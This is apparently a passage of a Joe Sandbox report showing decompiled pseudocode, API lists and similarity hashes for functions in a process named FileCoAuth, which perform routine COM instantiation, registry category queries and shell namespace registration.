					if( *_t14 != 0) {
						L4:
						 *_t8 =  *_t14;
						_t11 =  *_t14;
						 *((intOrPtr*)( *_t11 + 4))(_t11);
						L5:
						return _t17;
					}
					__imp__CoCreateInstance(0xea7298, 0, 1, 0xea75c4, _t14);
					_t17 = _t4;
					if(_t17 < 0) {
						goto L5;
					}
					goto L4;
				}
				return 0x80004003;
			}








    0x00e921a8
    0x00e921ad
    0x00e921b8
    0x00e921ba
    0x00e921bf
    0x00e921db
    0x00e921dd
    0x00e921df
    0x00e921e4
    0x00e921e7
    0x00000000
    0x00e921ea
    0x00e921cf
    0x00e921d5
    0x00e921d9
    0x00000000
    0x00000000
    0x00000000
    0x00e921d9
    0x00000000

    APIs
    • CoCreateInstance.OLE32(00EA7298,00000000,00000001,00EA75C4,?), ref: 00E921CF
    Memory Dump Source
    • Source File: 00000009.00000002.2316793338.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000002.2316778948.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000002.2316825591.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000002.2316842454.0000000000EB0000.00000004.sdmp Download File
    • Associated: 00000009.00000002.2316855023.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_2_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: CreateInstance
    • String ID:
    • API String ID: 542301482-0
    • Opcode ID: 7d65a5e2528b89af5d8a9c24e94dc33c711ea0a8a64726fd8fd5a553f6107721
    • Instruction ID: 45bc680efdbbb072dd4d1666f0a33597cedab540ac7cb6082efa05ad38952ee0
    • Opcode Fuzzy Hash: 7d65a5e2528b89af5d8a9c24e94dc33c711ea0a8a64726fd8fd5a553f6107721
    • Instruction Fuzzy Hash: 73F08272305321BB8B208A4ADC84D87FF69FF9AB647140129FB09BB240C771AD91C6E0
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00EA1383, Relevance: .0, Instructions: 5COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000009.00000002.2316793338.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000002.2316778948.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000002.2316825591.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000002.2316842454.0000000000EB0000.00000004.sdmp Download File
    • Associated: 00000009.00000002.2316855023.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_2_e90000_FileCoAuth.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: eeb57fb127891d248c5375ca62ab14c787cab61228f181d74c34b8be62bda9c0
    • Instruction ID: 28f81081e54c3c3fe9acdb58fd611feec5e228689653e31565a67e0d3cafbe26
    • Opcode Fuzzy Hash: eeb57fb127891d248c5375ca62ab14c787cab61228f181d74c34b8be62bda9c0
    • Instruction Fuzzy Hash: 52A02232008A0CCB022002833808A3233ACE2C3222A0800A0C020020008832B802C0C0
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00E97325, Relevance: .0, Instructions: 5COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000009.00000002.2316793338.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000002.2316778948.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000002.2316825591.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000002.2316842454.0000000000EB0000.00000004.sdmp Download File
    • Associated: 00000009.00000002.2316855023.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_2_e90000_FileCoAuth.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: af867031988d1e93d1f33451c3bab5638e9aa665bb94af2f62202d5f4176d987
    • Instruction ID: 552432a65a466be31d391fc92102282ccda79ca24349c63176a85813be10f0ab
    • Opcode Fuzzy Hash: af867031988d1e93d1f33451c3bab5638e9aa665bb94af2f62202d5f4176d987
    • Instruction Fuzzy Hash: A4A0223208820CCB02000283280A8323BACE2C3223A0800A0C038020028C32BC00C0C0
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00E9765E, Relevance: .0, Instructions: 5COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000009.00000002.2316793338.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000002.2316778948.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000002.2316825591.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000002.2316842454.0000000000EB0000.00000004.sdmp Download File
    • Associated: 00000009.00000002.2316855023.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_2_e90000_FileCoAuth.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 3812afd6f8f53872c19a41dcd0d70fb85c3a997224783276a53f7ddb1773b6c5
    • Instruction ID: 4b42e11199626a5624b84486ed5ee8f426fea28ee6b9599d26420665564b2ac4
    • Opcode Fuzzy Hash: 3812afd6f8f53872c19a41dcd0d70fb85c3a997224783276a53f7ddb1773b6c5
    • Instruction Fuzzy Hash: 11A0223200820CCB02000283280883233CCC2C3222A0800A0C020020000833F80AC0E0
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00E95DAE, Relevance: .0, Instructions: 5COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000009.00000002.2316793338.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000002.2316778948.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000002.2316825591.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000002.2316842454.0000000000EB0000.00000004.sdmp Download File
    • Associated: 00000009.00000002.2316855023.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_2_e90000_FileCoAuth.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 9e8b77ebda1be74b234cf3a881a705d0146aed5095c8777981a55ad1b9f3d955
    • Instruction ID: 5c141a61835044b6c514d6dea91e93add5fb338f1ac3b6311f0c815beb5dc167
    • Opcode Fuzzy Hash: 9e8b77ebda1be74b234cf3a881a705d0146aed5095c8777981a55ad1b9f3d955
    • Instruction Fuzzy Hash: 87A0223200820CCF022003832808832338CC2C3222E0800A2C200020000832F800C0C0
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00E92546, Relevance: 31.8, APIs: 14, Strings: 4, Instructions: 264registrycomCOMMON
    Download Yara Rule
    C-Code - Quality: 48%
    			E00E92546(int __ecx, long __edx, intOrPtr _a4) {
				signed int _v12;
				char _v272;
				char _v400;
				int _v404;
				void* _v408;
				short* _v412;
				short* _v416;
				void* _v420;
				short* _v424;
				short* _v428;
				void* _v432;
				char _v448;
				long _v452;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t69;
				intOrPtr* _t71;
				char* _t75;
				intOrPtr* _t76;
				intOrPtr* _t77;
				intOrPtr* _t81;
				short* _t82;
				void* _t96;
				void* _t107;
				long _t111;
				long _t116;
				short* _t120;
				short* _t122;
				intOrPtr _t127;
				intOrPtr _t128;
				char* _t144;
				intOrPtr* _t145;
				void* _t148;
				intOrPtr* _t149;
				void* _t150;
				signed int _t151;
				void* _t160;
				void* _t161;
				void* _t162;
				void* _t163;

				_t143 = __edx;
				_t69 =  *0xeb0090; // 0xbd336131
				_v12 = _t69 ^ _t151;
				_t120 = 0;
				_v452 = __edx;
				_t71 = 0;
				_v408 = 0;
				_t148 = __ecx;
				_v404 = __ecx;
				if(__edx == 0) {
					L37:
					_t122 = _t120;
					L38:
					_t120 = _t122;
					L39:
					if(_t71 != 0) {
						 *((intOrPtr*)( *_t71 + 8))(_t71);
					}
					return E00EA29F2(_t120, _v12 ^ _t151, _t143, _t144, _t148);
				}
				_t160 =  *__ecx -  *0xea7288; // 0x0
				if(_t160 != 0) {
					L5:
					_t75 =  &_v408;
					__imp__CoCreateInstance(0xea72a8, _t120, 1, 0xea7544, _t75);
					if(_t75 < 0) {
						_t71 = _v408;
						goto L37;
					} else {
						_t76 = _v452;
						while( *_t76 != _t120) {
							_t144 =  &_v448;
							_t148 =  *(_t76 + 4);
							_t143 =  &_v448;
							_push( &_v448);
							_push(1);
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							if(_a4 == _t120) {
								_t77 = _v408;
								_t148 = _v404;
								_push(_t148);
								_push(_t77);
								_t127 =  *_t77;
								if( *_t76 != 1) {
									 *((intOrPtr*)(_t127 + 0x20))();
								} else {
									 *((intOrPtr*)(_t127 + 0x18))();
								}
								L16:
								_t76 = _v452 + 8;
								_v452 = _t76;
								continue;
							}
							_t81 = _v408;
							_push(_v404);
							_push(_t81);
							_t128 =  *_t81;
							if( *_t76 != 1) {
								_t82 =  *((intOrPtr*)(_t128 + 0x1c))();
							} else {
								_t82 =  *((intOrPtr*)(_t128 + 0x14))();
							}
							_t122 = _t82;
							if(_t122 < 0) {
								_t71 = _v408;
								goto L38;
							} else {
								_t148 = _v404;
								goto L16;
							}
						}
						if(_a4 == _t120) {
							__imp__StringFromGUID2(_t148,  &_v400, 0x40);
							__imp__wcscpy_s( &_v272, 0x80, L"CLSID\\");
							L00E91E60( &_v272);
							_t145 = __imp__wcscat_s;
							L00E91E60( *_t145( &_v272, 0x80,  &_v400));
							L00E91E60( *_t145( &_v272, 0x80, L"\\Required Categories"));
							_v404 = _t120;
							asm("stosd");
							asm("stosd");
							asm("stosd");
							_v432 = 0x80000000;
							asm("stosd");
							_v428 = _t120;
							_v424 = _t120;
							asm("stosd");
							asm("stosd");
							_v420 = _t120;
							_v416 = _t120;
							_v412 = _t120;
							_t96 = E00E9235A(_t120,  &_v420, 0x80000000,  &_v272, 0x20019);
							_t144 = RegCloseKey;
							if(_t96 == 0) {
								_t150 = _v420;
								_t116 = RegQueryInfoKeyW(_t150, _t120, _t120, _t120,  &_v404, _t120, _t120, _t120, _t120, _t120, _t120, _t120);
								_v452 = _t116;
								if(_t150 != 0) {
									RegCloseKey(_t150);
									_t116 = _v452;
									_v420 = _t120;
								}
								_v416 = _t120;
								if(_t116 == 0 && _v404 == _t120) {
									E00E922DF( &_v432,  &_v272);
								}
							}
							__imp__wcscpy_s( &_v272, 0x80, L"CLSID\\");
							L00E91E60( &_v272);
							_t149 = __imp__wcscat_s;
							L00E91E60( *_t149( &_v272, 0x80,  &_v400));
							L00E91E60( *_t149( &_v272, 0x80, L"\\Implemented Categories"));
							_t107 = E00E9235A(_t120,  &_v420, 0x80000000,  &_v272, 0x20019);
							_t148 = _v420;
							if(_t107 == 0) {
								_t111 = RegQueryInfoKeyW(_t148, _t120, _t120, _t120,  &_v404, _t120, _t120, _t120, _t120, _t120, _t120, _t120);
								_v452 = _t111;
								if(_t148 != 0) {
									RegCloseKey(_t148);
									_t111 = _v452;
									_t148 = _t120;
								}
								if(_t111 == 0 && _v404 == _t120) {
									E00E922DF( &_v432,  &_v272);
								}
							}
							if(_t148 != 0) {
								RegCloseKey(_t148);
							}
							RegCloseKey(0x80000000);
						}
						_t71 = _v408;
						goto L39;
					}
				}
				_t161 =  *((intOrPtr*)(__ecx + 4)) -  *0xea728c; // 0x0
				if(_t161 != 0) {
					goto L5;
				}
				_t162 =  *((intOrPtr*)(__ecx + 8)) -  *0xea7290; // 0x0
				if(_t162 != 0) {
					goto L5;
				}
				_t163 =  *((intOrPtr*)(__ecx + 0xc)) -  *0xea7294; // 0x0
				if(_t163 == 0) {
					goto L37;
				}
				goto L5;
			}












































    0x00e92546
    0x00e92551
    0x00e92558
    0x00e9255c
    0x00e9255e
    0x00e92564
    0x00e92566
    0x00e9256d
    0x00e9256f
    0x00e92578
    0x00e92886
    0x00e92886
    0x00e92888
    0x00e92888
    0x00e9288a
    0x00e9288c
    0x00e92891
    0x00e92891
    0x00e928a6
    0x00e928a6
    0x00e92580
    0x00e92586
    0x00e925ad
    0x00e925ad
    0x00e925c1
    0x00e925c9
    0x00e92880
    0x00000000
    0x00e925cf
    0x00e925cf
    0x00e9264c
    0x00e925d7
    0x00e925dd
    0x00e925e0
    0x00e925e6
    0x00e925e7
    0x00e925e9
    0x00e925ea
    0x00e925eb
    0x00e925ec
    0x00e925f0
    0x00e92623
    0x00e92629
    0x00e9262f
    0x00e92630
    0x00e92631
    0x00e92633
    0x00e9263a
    0x00e92635
    0x00e92635
    0x00e92635
    0x00e9263d
    0x00e92643
    0x00e92646
    0x00000000
    0x00e92646
    0x00e925f5
    0x00e925fb
    0x00e92601
    0x00e92602
    0x00e92604
    0x00e9260b
    0x00e92606
    0x00e92606
    0x00e92606
    0x00e9260e
    0x00e92612
    0x00e92878
    0x00000000
    0x00e92618
    0x00e92618
    0x00000000
    0x00e92618
    0x00e92612
    0x00e92653
    0x00e92663
    0x00e9267a
    0x00e92685
    0x00e9268a
    0x00e926aa
    0x00e926c7
    0x00e926ce
    0x00e926df
    0x00e926e5
    0x00e926e6
    0x00e926ef
    0x00e926f5
    0x00e926f6
    0x00e926fc
    0x00e92702
    0x00e92703
    0x00e92712
    0x00e92718
    0x00e9271e
    0x00e92724
    0x00e92729
    0x00e92731
    0x00e92734
    0x00e9274b
    0x00e92751
    0x00e92759
    0x00e9275c
    0x00e9275e
    0x00e92764
    0x00e92764
    0x00e9276a
    0x00e92772
    0x00e92789
    0x00e92789
    0x00e92772
    0x00e9279f
    0x00e927aa
    0x00e927af
    0x00e927cf
    0x00e927ec
    0x00e92808
    0x00e9280d
    0x00e92815
    0x00e92829
    0x00e9282f
    0x00e92837
    0x00e9283a
    0x00e9283c
    0x00e92842
    0x00e92842
    0x00e92846
    0x00e9285d
    0x00e9285d
    0x00e92846
    0x00e92864
    0x00e92867
    0x00e92867
    0x00e9286e
    0x00e9286e
    0x00e92870
    0x00000000
    0x00e92870
    0x00e925c9
    0x00e9258b
    0x00e92591
    0x00000000
    0x00000000
    0x00e92596
    0x00e9259c
    0x00000000
    0x00000000
    0x00e925a1
    0x00e925a7
    0x00000000
    0x00000000
    0x00000000

    APIs
    • CoCreateInstance.OLE32(00EA72A8,00000000,00000001,00EA7544,?,?,Dv), ref: 00E925C1
    • StringFromGUID2.OLE32(?,?,00000040,?,Dv), ref: 00E92663
    • wcscpy_s.MSVCR120 ref: 00E9267A
    • wcscat_s.MSVCR120 ref: 00E926A3
    • wcscat_s.MSVCR120 ref: 00E926C0
    • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,80000000,?,00020019), ref: 00E9274B
    • RegCloseKey.ADVAPI32(?), ref: 00E9275C
    • wcscpy_s.MSVCR120 ref: 00E9279F
    • wcscat_s.MSVCR120 ref: 00E927C8
    • wcscat_s.MSVCR120 ref: 00E927E5
    • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,80000000,?,00020019), ref: 00E92829
    • RegCloseKey.ADVAPI32(?), ref: 00E9283A
    • RegCloseKey.ADVAPI32(?,80000000,?,00020019), ref: 00E92867
    • RegCloseKey.ADVAPI32(80000000,80000000,?,00020019), ref: 00E9286E
    Strings
    Memory Dump Source
    • Source File: 00000009.00000002.2316793338.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000002.2316778948.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000002.2316825591.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000002.2316842454.0000000000EB0000.00000004.sdmp Download File
    • Associated: 00000009.00000002.2316855023.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_2_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: Closewcscat_s$InfoQuerywcscpy_s$CreateFromInstanceString
    • String ID: CLSID\$Dv$\Implemented Categories$\Required Categories
    • API String ID: 1945653186-993552892
    • Opcode ID: ee46fe441359051f47bf3ee32a53d727e18ca23ccd549d8ddbafa05c6d622d8a
    • Instruction ID: ceef259d9adcfe02b7ca737f66971cc5497ab2f303da7b7a504173c31a35f7ac
    • Opcode Fuzzy Hash: ee46fe441359051f47bf3ee32a53d727e18ca23ccd549d8ddbafa05c6d622d8a
    • Instruction Fuzzy Hash: 0F915171A01229AFDF25DF54CC91BEAB7B9BF4A344F0041E9EA49B7150D730AE848F91
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00E92546, Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 264registrycomCOMMON
    Download Yara Rule
    C-Code - Quality: 48%
    			E00E92546(int __ecx, long __edx, intOrPtr _a4) {
				signed int _v12;
				char _v272;
				char _v400;
				int _v404;
				void* _v408;
				short* _v412;
				short* _v416;
				void* _v420;
				short* _v424;
				short* _v428;
				void* _v432;
				char _v448;
				long _v452;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t69;
				intOrPtr* _t71;
				char* _t75;
				intOrPtr* _t76;
				intOrPtr* _t77;
				intOrPtr* _t81;
				short* _t82;
				void* _t96;
				void* _t107;
				long _t111;
				long _t116;
				short* _t120;
				short* _t122;
				intOrPtr _t127;
				intOrPtr _t128;
				char* _t144;
				intOrPtr* _t145;
				void* _t148;
				intOrPtr* _t149;
				void* _t150;
				signed int _t151;
				void* _t160;
				void* _t161;
				void* _t162;
				void* _t163;

				_t143 = __edx;
				_t69 =  *0xeb0090; // 0xbb40e64e
				_v12 = _t69 ^ _t151;
				_t120 = 0;
				_v452 = __edx;
				_t71 = 0;
				_v408 = 0;
				_t148 = __ecx;
				_v404 = __ecx;
				if(__edx == 0) {
					L37:
					_t122 = _t120;
					L38:
					_t120 = _t122;
					L39:
					if(_t71 != 0) {
						 *((intOrPtr*)( *_t71 + 8))(_t71);
					}
					return E00EA29F2(_t120, _v12 ^ _t151, _t143, _t144, _t148);
				}
				_t160 =  *__ecx -  *0xea7288; // 0x0
				if(_t160 != 0) {
					L5:
					_t75 =  &_v408;
					__imp__CoCreateInstance(0xea72a8, _t120, 1, 0xea7544, _t75);
					if(_t75 < 0) {
						_t71 = _v408;
						goto L37;
					} else {
						_t76 = _v452;
						while( *_t76 != _t120) {
							_t144 =  &_v448;
							_t148 =  *(_t76 + 4);
							_t143 =  &_v448;
							_push( &_v448);
							_push(1);
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							if(_a4 == _t120) {
								_t77 = _v408;
								_t148 = _v404;
								_push(_t148);
								_push(_t77);
								_t127 =  *_t77;
								if( *_t76 != 1) {
									 *((intOrPtr*)(_t127 + 0x20))();
								} else {
									 *((intOrPtr*)(_t127 + 0x18))();
								}
								L16:
								_t76 = _v452 + 8;
								_v452 = _t76;
								continue;
							}
							_t81 = _v408;
							_push(_v404);
							_push(_t81);
							_t128 =  *_t81;
							if( *_t76 != 1) {
								_t82 =  *((intOrPtr*)(_t128 + 0x1c))();
							} else {
								_t82 =  *((intOrPtr*)(_t128 + 0x14))();
							}
							_t122 = _t82;
							if(_t122 < 0) {
								_t71 = _v408;
								goto L38;
							} else {
								_t148 = _v404;
								goto L16;
							}
						}
						if(_a4 == _t120) {
							__imp__StringFromGUID2(_t148,  &_v400, 0x40);
							__imp__wcscpy_s( &_v272, 0x80, L"CLSID\\");
							L00E91E60( &_v272);
							_t145 = __imp__wcscat_s;
							L00E91E60( *_t145( &_v272, 0x80,  &_v400));
							L00E91E60( *_t145( &_v272, 0x80, L"\\Required Categories"));
							_v404 = _t120;
							asm("stosd");
							asm("stosd");
							asm("stosd");
							_v432 = 0x80000000;
							asm("stosd");
							_v428 = _t120;
							_v424 = _t120;
							asm("stosd");
							asm("stosd");
							_v420 = _t120;
							_v416 = _t120;
							_v412 = _t120;
							_t96 = E00E9235A(_t120,  &_v420, 0x80000000,  &_v272, 0x20019);
							_t144 = RegCloseKey;
							if(_t96 == 0) {
								_t150 = _v420;
								_t116 = RegQueryInfoKeyW(_t150, _t120, _t120, _t120,  &_v404, _t120, _t120, _t120, _t120, _t120, _t120, _t120);
								_v452 = _t116;
								if(_t150 != 0) {
									RegCloseKey(_t150);
									_t116 = _v452;
									_v420 = _t120;
								}
								_v416 = _t120;
								if(_t116 == 0 && _v404 == _t120) {
									E00E922DF( &_v432,  &_v272);
								}
							}
							__imp__wcscpy_s( &_v272, 0x80, L"CLSID\\");
							L00E91E60( &_v272);
							_t149 = __imp__wcscat_s;
							L00E91E60( *_t149( &_v272, 0x80,  &_v400));
							L00E91E60( *_t149( &_v272, 0x80, L"\\Implemented Categories"));
							_t107 = E00E9235A(_t120,  &_v420, 0x80000000,  &_v272, 0x20019);
							_t148 = _v420;
							if(_t107 == 0) {
								_t111 = RegQueryInfoKeyW(_t148, _t120, _t120, _t120,  &_v404, _t120, _t120, _t120, _t120, _t120, _t120, _t120);
								_v452 = _t111;
								if(_t148 != 0) {
									RegCloseKey(_t148);
									_t111 = _v452;
									_t148 = _t120;
								}
								if(_t111 == 0 && _v404 == _t120) {
									E00E922DF( &_v432,  &_v272);
								}
							}
							if(_t148 != 0) {
								RegCloseKey(_t148);
							}
							RegCloseKey(0x80000000);
						}
						_t71 = _v408;
						goto L39;
					}
				}
				_t161 =  *((intOrPtr*)(__ecx + 4)) -  *0xea728c; // 0x0
				if(_t161 != 0) {
					goto L5;
				}
				_t162 =  *((intOrPtr*)(__ecx + 8)) -  *0xea7290; // 0x0
				if(_t162 != 0) {
					goto L5;
				}
				_t163 =  *((intOrPtr*)(__ecx + 0xc)) -  *0xea7294; // 0x0
				if(_t163 == 0) {
					goto L37;
				}
				goto L5;
			}












































    0x00e92546
    0x00e92551
    0x00e92558
    0x00e9255c
    0x00e9255e
    0x00e92564
    0x00e92566
    0x00e9256d
    0x00e9256f
    0x00e92578
    0x00e92886
    0x00e92886
    0x00e92888
    0x00e92888
    0x00e9288a
    0x00e9288c
    0x00e92891
    0x00e92891
    0x00e928a6
    0x00e928a6
    0x00e92580
    0x00e92586
    0x00e925ad
    0x00e925ad
    0x00e925c1
    0x00e925c9
    0x00e92880
    0x00000000
    0x00e925cf
    0x00e925cf
    0x00e9264c
    0x00e925d7
    0x00e925dd
    0x00e925e0
    0x00e925e6
    0x00e925e7
    0x00e925e9
    0x00e925ea
    0x00e925eb
    0x00e925ec
    0x00e925f0
    0x00e92623
    0x00e92629
    0x00e9262f
    0x00e92630
    0x00e92631
    0x00e92633
    0x00e9263a
    0x00e92635
    0x00e92635
    0x00e92635
    0x00e9263d
    0x00e92643
    0x00e92646
    0x00000000
    0x00e92646
    0x00e925f5
    0x00e925fb
    0x00e92601
    0x00e92602
    0x00e92604
    0x00e9260b
    0x00e92606
    0x00e92606
    0x00e92606
    0x00e9260e
    0x00e92612
    0x00e92878
    0x00000000
    0x00e92618
    0x00e92618
    0x00000000
    0x00e92618
    0x00e92612
    0x00e92653
    0x00e92663
    0x00e9267a
    0x00e92685
    0x00e9268a
    0x00e926aa
    0x00e926c7
    0x00e926ce
    0x00e926df
    0x00e926e5
    0x00e926e6
    0x00e926ef
    0x00e926f5
    0x00e926f6
    0x00e926fc
    0x00e92702
    0x00e92703
    0x00e92712
    0x00e92718
    0x00e9271e
    0x00e92724
    0x00e92729
    0x00e92731
    0x00e92734
    0x00e9274b
    0x00e92751
    0x00e92759
    0x00e9275c
    0x00e9275e
    0x00e92764
    0x00e92764
    0x00e9276a
    0x00e92772
    0x00e92789
    0x00e92789
    0x00e92772
    0x00e9279f
    0x00e927aa
    0x00e927af
    0x00e927cf
    0x00e927ec
    0x00e92808
    0x00e9280d
    0x00e92815
    0x00e92829
    0x00e9282f
    0x00e92837
    0x00e9283a
    0x00e9283c
    0x00e92842
    0x00e92842
    0x00e92846
    0x00e9285d
    0x00e9285d
    0x00e92846
    0x00e92864
    0x00e92867
    0x00e92867
    0x00e9286e
    0x00e9286e
    0x00e92870
    0x00000000
    0x00e92870
    0x00e925c9
    0x00e9258b
    0x00e92591
    0x00000000
    0x00000000
    0x00e92596
    0x00e9259c
    0x00000000
    0x00000000
    0x00e925a1
    0x00e925a7
    0x00000000
    0x00000000
    0x00000000

    APIs
    • CoCreateInstance.OLE32(00EA72A8,00000000,00000001,00EA7544,?,?,?), ref: 00E925C1
    • StringFromGUID2.OLE32(?,?,00000040,?,?), ref: 00E92663
    • wcscpy_s.MSVCR120 ref: 00E9267A
    • wcscat_s.MSVCR120 ref: 00E926A3
    • wcscat_s.MSVCR120 ref: 00E926C0
    • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,80000000,?,00020019), ref: 00E9274B
    • RegCloseKey.ADVAPI32(?), ref: 00E9275C
    • wcscpy_s.MSVCR120 ref: 00E9279F
    • wcscat_s.MSVCR120 ref: 00E927C8
    • wcscat_s.MSVCR120 ref: 00E927E5
    • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,80000000,?,00020019), ref: 00E92829
    • RegCloseKey.ADVAPI32(?), ref: 00E9283A
    • RegCloseKey.ADVAPI32(?,80000000,?,00020019), ref: 00E92867
    • RegCloseKey.ADVAPI32(80000000,80000000,?,00020019), ref: 00E9286E
    Strings
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp Download File
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: Closewcscat_s$InfoQuerywcscpy_s$CreateFromInstanceString
    • String ID: CLSID\$\Implemented Categories$\Required Categories
    • API String ID: 1945653186-4092563799
    • Opcode ID: ee46fe441359051f47bf3ee32a53d727e18ca23ccd549d8ddbafa05c6d622d8a
    • Instruction ID: ceef259d9adcfe02b7ca737f66971cc5497ab2f303da7b7a504173c31a35f7ac
    • Opcode Fuzzy Hash: ee46fe441359051f47bf3ee32a53d727e18ca23ccd549d8ddbafa05c6d622d8a
    • Instruction Fuzzy Hash: 0F915171A01229AFDF25DF54CC91BEAB7B9BF4A344F0041E9EA49B7150D730AE848F91
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00EA1C98, Relevance: 26.7, APIs: 1, Strings: 14, Instructions: 412COMMON
    Download Yara Rule
    C-Code - Quality: 99%
    			E00EA1C98(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t193;
				void* _t309;
				void* _t313;
				intOrPtr _t328;
				void* _t330;

				_t313 = __edx;
				_push(0x88);
				E00EA3194(E00EA560B, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t330 - 0x8c)) =  *((intOrPtr*)(_t330 + 8));
				 *((intOrPtr*)(_t330 - 0x94)) =  *((intOrPtr*)(_t330 + 0x1c));
				E00E94E9D(_t330 - 0x70, L"Software\\Classes\\CLSID\\");
				 *(_t330 - 4) = 0;
				E00E95904(_t330 - 0x70,  *((intOrPtr*)(_t330 + 0xc)), 0, 0xffffffff);
				E00E94E9D(_t330 - 0x28, 0xea7340);
				 *(_t330 - 4) = 1;
				_t259 =  *((intOrPtr*)(_t330 + 0x20));
				_t324 = E00E9F5DC(0x80000001, _t330 - 0x70, _t330 - 0x28,  *((intOrPtr*)(_t330 + 0x10)),  *((intOrPtr*)(_t330 + 0x20)), 0);
				 *(_t330 - 4) = 0;
				E00E94307(_t330 - 0x28, 1, 0);
				if(_t158 >= 0) {
					 *((intOrPtr*)(_t330 - 0x90)) = 1;
					E00E94E9D(_t330 - 0x28, L"System.IsPinnedToNameSpaceTree");
					 *(_t330 - 4) = 2;
					_t324 = E00E9F559(0x80000001, _t330 - 0x70, _t330 - 0x28, _t330 - 0x90, _t259);
					 *(_t330 - 4) = 0;
					E00E94307(_t330 - 0x28, 1, 0);
					if(_t167 >= 0) {
						 *((intOrPtr*)(_t330 - 0x90)) = 0x42;
						E00E94E9D(_t330 - 0x28, L"SortOrderIndex");
						 *(_t330 - 4) = 3;
						_t324 = E00E9F559(0x80000001, _t330 - 0x70, _t330 - 0x28, _t330 - 0x90, _t259);
						 *(_t330 - 4) = 0;
						E00E94307(_t330 - 0x28, 1, 0);
						_t334 = _t324;
						if(_t324 >= 0) {
							E00E9A1D7(_t330 - 0x28, _t330 - 0x70);
							 *(_t330 - 4) = 4;
							_t325 = L"\\InProcServer32";
							E00E98198(_t330 - 0x28, _t334, _t325, E00E94E74(L"\\InProcServer32"));
							E00E94E9D(_t330 - 0x40, L"%systemroot%\\system32\\shell32.dll");
							 *(_t330 - 4) = 5;
							E00E94E9D(_t330 - 0x58, 0xea7340);
							 *(_t330 - 4) = 6;
							_t324 = E00E9F5DC(0x80000001, _t330 - 0x28, _t330 - 0x58, _t330 - 0x40, _t259, 1);
							 *(_t330 - 4) = 5;
							E00E94307(_t330 - 0x58, 1, 0);
							 *(_t330 - 4) = 4;
							E00E94307(_t330 - 0x40, 1, 0);
							 *(_t330 - 4) = 0;
							E00E94307(_t330 - 0x28, 1, 0);
							if(_t324 >= 0) {
								E00E94E9D(_t330 - 0x58, _t193);
								 *(_t330 - 4) = 9;
								E00E94E9D(_t330 - 0x40, 0xea7340);
								 *(_t330 - 4) = 0xa;
